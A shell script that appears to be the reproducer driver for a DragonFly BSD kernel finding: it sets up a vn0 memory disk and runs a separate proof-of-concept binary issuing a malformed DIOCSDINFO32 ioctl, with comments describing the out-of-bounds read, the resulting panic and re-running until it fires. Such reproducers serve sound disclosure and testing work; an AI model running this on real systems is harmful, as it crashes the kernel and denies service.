DF-0107 / run.sh
#!/bin/sh
#
# DF-0107 -- reproducer driver for the DIOCSDINFO32 out-of-bounds read.
#
# Run on the DragonFly guest AS ROOT: vnconfig(8) and opening /dev/vn0s0
# O_RDWR both need root or the operator group. The test user (maxx) is
# deliberately not in operator, which matches the finding's threat model:
# the faulty path is reachable only with root/operator privileges, so the
# impact is a privileged-local kernel panic (DoS), not a privilege boundary
# crossing.
#
# What the script does: attaches an 8 MiB file-backed memory disk as vn0,
# then ./poc_diocsdinfo issues DIOCSDINFO32 with d_npartitions=0xFFFF.
# The kernel's dkcksum32() walks ~1 MiB past the 404-byte kmalloc'd ioctl
# label buffer. If the walk crosses a thread-stack guard page the guest
# panics:
#
#   panic: vm_fault: fault on stack guard, addr: 0xffff...
#   l32_setdisklabel() at l32_setdisklabel+0x57
#   dsioctl() at dsioctl+0x721
#
# Whether the walk hits a guard page depends on the current heap layout,
# so a single run may return cleanly; the script then exits 0 and is meant
# to be re-run until the panic fires. On a freshly booted guest it usually
# takes only a few attempts; on a churned heap it may take more.
#
# Side effects: recreates /tmp/oob.img and (re)configures vn0. Requires
# ./poc_diocsdinfo next to this script.

set -e

readonly img=/tmp/oob.img
readonly dev=/dev/vn0s0

#######################################
# Back vn0 with a fresh 8 MiB zero-filled image.
# Globals:   img (read), dev (read)
# Outputs:   error text on stdout if the device node never appears
# Returns:   0 on success; exits 1 if /dev/vn0s0 is missing
#######################################
setup_disk() {
  rm -f "$img"
  dd if=/dev/zero of="$img" bs=1m count=8 >/dev/null 2>&1
  # '|| true' keeps 'set -e' from aborting when vnconfig fails -- presumably
  # because vn0 is still attached from an earlier run (not verified here).
  # The device-node check below is the real gate.
  vnconfig -c vn0 "$img" >/dev/null 2>&1 || true
  if [ ! -e "$dev" ]; then
    printf '%s\n' "vn0s0 did not appear"
    exit 1
  fi
}

#######################################
# Entry point: prepare the disk and issue the ioctl.
# Globals:   dev (read)
# Outputs:   progress lines on stdout
# Returns:   0 if the ioctl returns (no panic this time)
#######################################
main() {
  # Work relative to the script so ./poc_diocsdinfo resolves.
  cd "$(dirname "$0")"
  setup_disk
  printf '%s\n' "[*] issuing DIOCSDINFO32 with d_npartitions=0xFFFF on /dev/vn0s0"
  ./poc_diocsdinfo "$dev"
  # Reached only when the out-of-bounds walk stayed inside mapped memory.
  printf '%s\n' "[*] ioctl returned without panic (try again -- panic is probabilistic)"
}

main "$@"